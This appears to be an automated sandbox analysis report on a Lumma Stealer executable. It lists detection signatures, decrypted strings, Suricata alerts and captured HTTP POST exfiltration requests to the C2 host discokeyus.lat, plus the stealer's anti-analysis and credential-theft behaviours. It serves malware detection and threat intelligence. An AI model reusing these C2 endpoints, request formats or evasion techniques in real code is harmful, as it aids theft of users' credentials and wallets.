Windows Analysis Report
NAliwxUTJ4.exe

Overview

General Information

Sample name: NAliwxUTJ4.exe (renamed because the original name is a hash value)
Original sample name: 0a678f4e43e83079c1e95517f576a88d.exe
Analysis ID: 1578940
MD5: 0a678f4e43e83079c1e95517f576a88d
SHA1: 4012a39b2f700273402d3adbc54f0f87eac2fa56
SHA256: 6b17962e6298e3118f5301af6bdceccbf3c79663e4a526e128a5c306a232bc01
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NAliwxUTJ4.exe (PID: 828 cmdline: "C:\Users\user\Desktop\NAliwxUTJ4.exe" MD5: 0A678F4E43E83079C1E95517F576A88D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Extracted malware configuration: {"C2 url": "https://discokeyus.lat/api", "Build Version": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: NAliwxUTJ4.exe PID: 828 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: NAliwxUTJ4.exe PID: 828 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: NAliwxUTJ4.exe PID: 828 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T16:55:45.988644+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:49.316014+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:51.829517+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49719 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:54.160731+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:57.164911+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49723 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:00.318496+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:02.993587+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:07.187800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:47.721915+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:50.075795+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:47.721915+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:50.075795+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:45.988644+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:49.316014+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:51.829517+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49719 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:54.160731+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:57.164911+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49723 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:00.318496+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:02.993587+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:07.187800+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:44.125790+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63435 | 1.1.1.1 | 53 | UDP
2024-12-20T16:55:43.929541+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 64495 | 1.1.1.1 | 53 | UDP
2024-12-20T16:55:43.732478+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 58462 | 1.1.1.1 | 53 | UDP
2024-12-20T16:56:01.110822+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:03.034655+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP

              AV Detection

Source: NAliwxUTJ4.exe | Avira: detected
Source: 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": "https://discokeyus.lat/api", "Build Version": "PsFKDg--pablo"}
Source: NAliwxUTJ4.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: NAliwxUTJ4.exe | Joe Sandbox ML: detected
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sweepyribs.lat
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: NAliwxUTJ4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: C:\Users\user\Desktop\NAliwxUTJ4.exe | Directory queried: number of queries: 1001

              Networking

Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:58462 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:64495 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49719 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49721 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:63435 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49723 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49718 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49729 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49716 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.6:49726 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49716 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49718 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49718 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49726 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49729 -> 104.21.21.99:443
Source: Malware configuration extractor | URLs: https://discokeyus.lat/api
Source: Joe Sandbox View | IP Address: 104.21.21.99
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49723 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 104.21.21.99:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5FO31SHX5ZU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12817
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=L8WUA7W76SOR97JQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15093
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EQ0XRQAPW21
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19921
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=861PTFRQQ7MW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1217
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QIGSWE36PS2VX4N
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552861
    Host: discokeyus.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NAliwxUTJ4.exe, 00000001.00000003.2648298445.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673811023.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/J
Source: NAliwxUTJ4.exe, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2607886558.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688281522.00000000054C1000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639157028.00000000054C5000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726834130.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688428313.00000000054A5000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2640359050.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648543272.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669757104.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2727028041.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688082544.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiak
Source: NAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639237104.00000000054AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiu
Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/g$
Source: NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/q_2
